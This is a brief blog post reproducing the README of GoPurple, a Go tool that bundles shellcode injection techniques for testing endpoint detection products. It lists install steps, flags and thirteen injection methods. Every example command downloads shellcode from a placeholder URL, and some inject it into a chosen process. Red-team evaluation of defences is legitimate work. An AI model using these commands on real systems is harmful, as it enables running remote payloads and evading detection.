iGuRu

GoPurple: Shell code injection techniques

23/09/2020 11:23 by Anastasis Vasileiadis

GoPurple is a simple collection of various shellcode injection techniques, aimed at streamlining the evaluation of endpoint detection products; its author also describes it as a personal challenge to get into Golang.

Installation

git clone https://github.com/sh4hin/GoPurple.git
cd GoPurple
go build gopurple.go

Usage

-a string
    Program command line arguments
-b string
    block DLL mode (nonms / onlystore for QueueUserAPC)
-p int
    Process ID to inject shellcode into
-prog string
    program to inject into
-t string
    shellcode injection technique to use:
    1: CreateFiber
    2: syscall
    3: CreatetThreadNative
    4: CreateProcess
    5: EtwpCreateEtwThread
    6: CreateRemoteThread
    7: RtlCreateUserThread
    8: CreateThread
    9: CreateRemoteThreadNative
    10: CreateProcessWithPipe
    11: QueueUserAPC
    12: CreateThreadpoolWaitpool
    13: BananaPhone
-u string
    URL hosting the shellcode

Examples

1 - gopurple.exe -u urlhostingpayload -t 1 (CreateFiber)

2 - gopurple.exe -u urlhostingpayload -t 2 (Syscall)

3 - gopurple.exe -u urlhostingpayload -t 3 (CreatetThreadNative)

4 - gopurple.exe -u urlhostingpayload -t 4 (CreateProcess)

5 - gopurple.exe -u urlhostingpayload -t 5 (EtwpCreateEtwThread)

6 - gopurple.exe -u urlhostingpayload -t 6 -p targetprocess (CreateRemoteThread)

7 - gopurple.exe -u urlhostingpayload -t 7 -p targetprocess (RtlCreateUserThread)

8 - gopurple.exe -u urlhostingpayload -t 8 (CreateThread)

9 - gopurple.exe -u urlhostingpayload -t 9 -p targetprocess (CreateRemoteThreadNative)

10 - gopurple.exe -u urlhostingpayload -t 10 -prog program -a processargument (CreateProcessWithPipe), where program is for example C:\Windows\System32\WindowsPowerShell\v1.0 and processargument is for example Get-Process

11 - gopurple.exe -u urlhostingpayload -t 11 -p targetpidasparentprocess -prog programtoinjectshellcodeinto -b methodtoblockdll (nonms or onlystore) (QueueUserAPC)

    nonms = only DLLs signed by Microsoft can be loaded into the process

    onlystore = only DLLs belonging to Microsoft Store applications can be loaded into the process

12 - gopurple.exe -u urlhostingpayload -t 12 (CreateThreadpoolWaitpool)

13 - gopurple.exe -u urlhostingpayload -t 13 (BananaPhone)

You can download the program from the GitHub repository linked in the installation section above.